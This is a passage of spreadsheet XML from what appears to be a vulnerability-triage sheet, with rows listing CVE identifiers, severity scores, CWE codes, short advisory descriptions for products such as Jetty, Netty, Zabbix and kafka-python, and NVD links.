      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58374</t>
        </is>
      </c>
      <c r="C1090" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1090" s="5" t="inlineStr"/>
      <c r="F1090" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1090" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1090" s="5" t="inlineStr"/>
      <c r="I1090" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1090" s="5" t="inlineStr">
        <is>
          <t>Hongjing e-HR contains an unauthenticated SQL injection vulnerability in the getSdutyTree servlet endpoint that allows remote unauthenticated attackers to access protected resources by supplying a path traversal sequence in the request URI to bypass the oauthservlet authentication filter. Attackers can inject UNION-based SQL payloads through the unsanitized codeitemid parameter into the underlying Microsoft SQL Server query to retrieve sensitive database contents including user credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-07-30 (UTC).</t>
        </is>
      </c>
      <c r="M1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58374</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58375</t>
        </is>
      </c>
      <c r="C1091" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1091" s="5" t="inlineStr"/>
      <c r="F1091" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="inlineStr"/>
      <c r="I1091" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1091" s="5" t="inlineStr">
        <is>
          <t>OpenTofu versions 1.8.0 through 1.8.2 do not properly restrict sensitive variables and locals when users have opted into static evaluation of module sources, versions, and backend configurations. As a result, values marked as sensitive may be exposed through these configuration elements instead of producing an error. This is fixed in OpenTofu 1.8.3, which adds explicit errors to prevent the use of sensitive values in these contexts.</t>
        </is>
      </c>
      <c r="M1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58375</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58381</t>
        </is>
      </c>
      <c r="C1092" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1092" s="5" t="inlineStr"/>
      <c r="F1092" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="inlineStr"/>
      <c r="I1092" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1092" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.11.1 contains a denial of service vulnerability in LoginPacket JSON processing that allows remote attackers to crash the server by sending malformed JSON data. Attackers can exploit improper object initialization from scalar JSON types to trigger unset required properties, causing the application to crash.</t>
        </is>
      </c>
      <c r="M1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58381</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58382</t>
        </is>
      </c>
      <c r="C1093" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1093" s="5" t="inlineStr"/>
      <c r="F1093" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="inlineStr"/>
      <c r="I1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1093" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions before 2.6.0 contain polynomial time complexity vulnerabilities in Markdown parsing that allow attackers to cause denial of service. Attackers can submit carefully crafted Markdown inputs designed to trigger worst-case performance, and sending multiple requests in parallel exhausts CPU resources and PHP-FPM processes.</t>
        </is>
      </c>
      <c r="M1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58382</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-34115</t>
        </is>
      </c>
      <c r="C1094" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1094" s="5" t="inlineStr"/>
      <c r="F1094" s="5" t="n">
        <v>0.033</v>
      </c>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="inlineStr"/>
      <c r="I1094" s="5" t="inlineStr">
        <is>
          <t>2025-07-15</t>
        </is>
      </c>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-306, CWE-78</t>
        </is>
      </c>
      <c r="L1094" s="5" t="inlineStr">
        <is>
          <t>An authenticated command injection vulnerability exists in OP5 Monitor through version 7.1.9 via the 'cmd_str' parameter in the command_test.php endpoint. A user with access to the web interface can exploit the 'Test this command' feature to execute arbitrary shell commands as the unprivileged web application user. The vulnerability resides in the configuration section of the application and requires valid login credentials with access to the command testing functionality. This issue is fixed in version 7.2.0.</t>
        </is>
      </c>
      <c r="M1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-34115</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0799</t>
        </is>
      </c>
      <c r="C1095" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1095" s="5" t="inlineStr"/>
      <c r="F1095" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="inlineStr"/>
      <c r="I1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L1095" s="5" t="inlineStr">
        <is>
          <t>In BPF instructions that load/store a value from/to a scratch memory register the register index is an unsigned 32-bit integer and must not exceed 15, but libpcap BPF interpreter does not validate the value.  In particular uncommon use cases a crafted filter program can cause the interpreter to try reading and writing the OS process memory in the 16GiB starting at the current stack frame on 64-bit architectures and in the entire address space on 32-bit architectures.</t>
        </is>
      </c>
      <c r="M1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0799</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10143</t>
        </is>
      </c>
      <c r="C1096" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1096" s="5" t="inlineStr"/>
      <c r="F1096" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1096" s="5" t="inlineStr">
        <is>
          <t>python, kafka</t>
        </is>
      </c>
      <c r="H1096" s="5" t="inlineStr">
        <is>
          <t>dpkp:kafka-python</t>
        </is>
      </c>
      <c r="I1096" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-606</t>
        </is>
      </c>
      <c r="L1096" s="5" t="inlineStr">
        <is>
          <t>kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in SCRAM authentication handling that allows a malicious or machine-in-the-middle broker to freeze the client event loop by supplying an excessively large iteration count. In scram.py, ScramClient.process_server_first_message() passes the broker-controlled SCRAM iteration count directly to hashlib.pbkdf2_hmac() without validation, blocking producer sends, consumer polls, admin operations, and heartbeats, which can cause consumer group eviction and repeated reconnect failures.</t>
        </is>
      </c>
      <c r="M1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10143</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12143</t>
        </is>
      </c>
      <c r="C1097" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1097" s="5" t="inlineStr"/>
      <c r="F1097" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="inlineStr"/>
      <c r="I1097" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L1097" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">form-data </t>
        </is>
      </c>
      <c r="M1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12143</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12562</t>
        </is>
      </c>
      <c r="C1098" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1098" s="5" t="inlineStr"/>
      <c r="F1098" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="inlineStr"/>
      <c r="I1098" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1098" s="5" t="inlineStr">
        <is>
          <t>The RCU II+ and Multiload II+ are vulnerable to an unauthenticated 
service that exposes a debug interface granting full root-level access 
to the embedded system. This vulnerability stems from a 
network-accessible port running a Target Communications Framework (TCF) 
service that does not require any authentication, allowing an attacker 
to directly interact with the Linux environment that powers the device. 
Once connected, an attacker can freely view and modify the filesystem, 
manipulate running processes, and control network interfaces, enabling 
deep alteration of system behavior.</t>
        </is>
      </c>
      <c r="M1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12562</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12611</t>
        </is>
      </c>
      <c r="C1099" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1099" s="5" t="inlineStr"/>
      <c r="F1099" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="inlineStr"/>
      <c r="I1099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1099" s="5" t="inlineStr">
        <is>
          <t>A client may issue HTTP/2 requests to a Jetty server that result in blocking writes that are never unblocked, eventually causing all threads to be blocked and the whole server to become unresponsive.
This is caused by a race condition in the server when handling RST_STREAM frames and GOAWAY frames sent by the client.
The race condition "resets" the HTTP2Flusher.terminated, previously set to a non-null value, to the null value, allowing entries to be enqueued in the flusher that however will never be processed. These unprocessed entries are the ones that would unblock the write-blocked threads.</t>
        </is>
      </c>
      <c r="M1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14297</t>
        </is>
      </c>
      <c r="C1100" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1100" s="5" t="inlineStr"/>
      <c r="F1100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="inlineStr"/>
      <c r="I1100" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1100" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in the Bluetooth Continuous Glucose
     Monitoring Service (CGMS) Record Access Control Point (RACP) write handler
     allows an authenticated BLE peer to overflow a 20-byte static buffer into
     adjacent BSS memory. The exploitable impact cannot be predetermined - it
     is entirely dependent on the linker-assigned BSS layout of the specific
     firmware build, which may vary.</t>
        </is>
      </c>
      <c r="M1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14297</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16174</t>
        </is>
      </c>
      <c r="C1101" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1101" s="5" t="inlineStr"/>
      <c r="F1101" s="5" t="inlineStr"/>
      <c r="G1101" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1101" s="5" t="inlineStr"/>
      <c r="I1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1101" s="5" t="inlineStr">
        <is>
          <t>Netskope was notified about a potential gap in Netskope Endpoint DLP (EPDLP) running on Windows systems. Successful exploitation of the gap could potentially allow a privileged user to send a crafted message to the EPDLP process port to trigger an integer overflow, leading to memory corruption. Successful exploitation would require the EPDLP module to be enabled in the client configuration, and that Memory Integrity is disabled. A successful exploit could potentially result in a denial-of-service, arbitrary code execution, or privilege escalation on the local machine.</t>
        </is>
      </c>
      <c r="M1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16174</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18608</t>
        </is>
      </c>
      <c r="C1102" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1102" s="5" t="inlineStr"/>
      <c r="F1102" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1102" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1102" s="5" t="inlineStr"/>
      <c r="I1102" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1102" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator (DSPO). The operator's ClusterRole, which defines its permissions, includes extensive privileges beyond what is necessary for its operation. These excessive permissions, such as the ability to execute commands within pods and manage cluster-wide roles, could be exploited. If the DSPO pod were compromised, an attacker could leverage these privileges to gain full administrative control over the entire Kubernetes cluster.</t>
        </is>
      </c>
      <c r="M1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18608</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19204</t>
        </is>
      </c>
      <c r="C1103" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1103" s="5" t="inlineStr"/>
      <c r="F1103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1103" s="5" t="inlineStr"/>
      <c r="H1103" s="5" t="inlineStr"/>
      <c r="I1103" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1103" s="5" t="inlineStr"/>
      <c r="K1103" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L1103" s="5" t="inlineStr">
        <is>
          <t>A client may send a WebSocket frame with an unknown opcode and a very large declared payload length, causing Jetty to attempt a large memory allocation and potentially exhaust the JVM heap.
This occurs when auto-fragmentation is enabled, as unknown opcodes bypass the normal maximum frame size handling and payload allocation occurs before the opcode is validated.</t>
        </is>
      </c>
      <c r="M1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19204</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19486</t>
        </is>
      </c>
      <c r="C1104" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1104" s="5" t="inlineStr"/>
      <c r="F1104" s="5" t="inlineStr"/>
      <c r="G1104" s="5" t="inlineStr"/>
      <c r="H1104" s="5" t="inlineStr"/>
      <c r="I1104" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1104" s="5" t="inlineStr"/>
      <c r="K1104" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1104" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability in Google Cloud Gemini Enterprise Agent Platform App Builder versions prior to 2026-06-01 on Google Cloud Platform allows an unauthenticated attacker to leak the Compute Engine default service account access token.
This vulnerability was patched on 01 June 2026. Users will need to redeploy their previously deployed apps.</t>
        </is>
      </c>
      <c r="M1104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19486</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21042</t>
        </is>
      </c>
      <c r="C1105" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1105" s="5" t="inlineStr"/>
      <c r="F1105" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1105" s="5" t="inlineStr"/>
      <c r="H1105" s="5" t="inlineStr"/>
      <c r="I1105" s="5" t="inlineStr">
        <is>
          <t>2026-07-10</t>
        </is>
      </c>
      <c r="J1105" s="5" t="inlineStr"/>
      <c r="K1105" s="5" t="inlineStr"/>
      <c r="L1105" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsavsac.so prior to SMR Jul-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M1105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21042</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23921</t>
        </is>
      </c>
      <c r="C1106" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1106" s="5" t="inlineStr"/>
      <c r="F1106" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="G1106" s="5" t="inlineStr"/>
      <c r="H1106" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I1106" s="5" t="inlineStr">
        <is>
          <t>2026-03-24</t>
        </is>
      </c>
      <c r="J1106" s="5" t="inlineStr"/>
      <c r="K1106" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1106" s="5" t="inlineStr">
        <is>
          <t>A low privilege Zabbix user with API access can exploit a blind SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL selects via the sortfield parameter. Although query results are not returned directly, an attacker can exfiltrate arbitrary database data through time-based techniques, potentially leading to session identifier disclosure and administrator account compromise.</t>
        </is>
      </c>
      <c r="M1106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23921</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29063</t>
        </is>
      </c>
      <c r="C1107" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1107" s="5" t="inlineStr"/>
      <c r="F1107" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1107" s="5" t="inlineStr"/>
      <c r="H1107" s="5" t="inlineStr">
        <is>
          <t>immutable-js:immutable</t>
        </is>
      </c>
      <c r="I1107" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J1107" s="5" t="inlineStr"/>
      <c r="K1107" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L1107" s="5" t="inlineStr">
        <is>
          <t>Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.</t>
        </is>
      </c>
      <c r="M1107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29063</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33197</t>
        </is>
      </c>
      <c r="C1108" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1108" s="5" t="inlineStr"/>
      <c r="F1108" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1108" s="5" t="inlineStr"/>
      <c r="H1108" s="5" t="inlineStr"/>
      <c r="I1108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1108" s="5" t="inlineStr"/>
      <c r="K1108" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1108" s="5" t="inlineStr">
        <is>
          <t>AMI APTIOV contains a vulnerability in BIOS where a privileged user may cause the “Incomplete List of Disallowed Inputs” by local access. Successful exploitation of this vulnerability may lead to arbitrary code execution and impact system Confidentiality, Integrity, and Availability.</t>
        </is>
      </c>
      <c r="M1108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33871</t>
        </is>
      </c>
      <c r="C1109" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1109" s="5" t="inlineStr"/>
      <c r="F1109" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1109" s="5" t="inlineStr"/>
      <c r="H1109" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1109" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J1109" s="5" t="inlineStr"/>
      <c r="K1109" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1109" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue.</t>
        </is>
      </c>
      <c r="M1109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33871</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3505</t>
        </is>
      </c>
      <c r="C1110" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1110" s="5" t="inlineStr"/>
      <c r="F1110" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1110" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1110" s="5" t="inlineStr"/>
      <c r="I1110" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J1110" s="5" t="inlineStr"/>
      <c r="K1110" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1110" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling, Uncontrolled Resource Consumption vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpg on all (pg modules).
 This vulnerability is associated with program files AEADEncDataPacket.Java, BcAEADUtil.Java, JceAEADUtil.Java, OperatorHelper.Java.
This issue affects BC-JAVA: from 1.74 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M1110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3505</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35469</t>
        </is>
      </c>
